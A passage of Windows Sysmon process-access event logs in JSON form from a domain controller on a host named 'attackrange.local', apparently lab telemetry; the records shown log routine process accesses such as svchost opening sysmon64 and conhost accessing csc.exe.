06:55:03.710","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5129,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.710\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.710","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5130,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.710\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.710","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5131,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.710\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.710","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5132,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.710\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.710","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5133,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.710\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.710","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5134,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.710\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.710","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5135,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.710\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.710","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5136,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.710\r\nSourceProcessGUID: {E2A3D6B1-11C4-5F25-0000-001043D90600}\r\nSourceProcessId: 4776\r\nSourceThreadId: 1092\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C7-5F25-0000-0010882D0700}\r\nTargetProcessId: 4228\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.710","SourceProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001043D90600}","SourceProcessId":"4776","SourceThreadId":"1092","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C7-5F25-0000-0010882D0700}","TargetProcessId":"4228","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 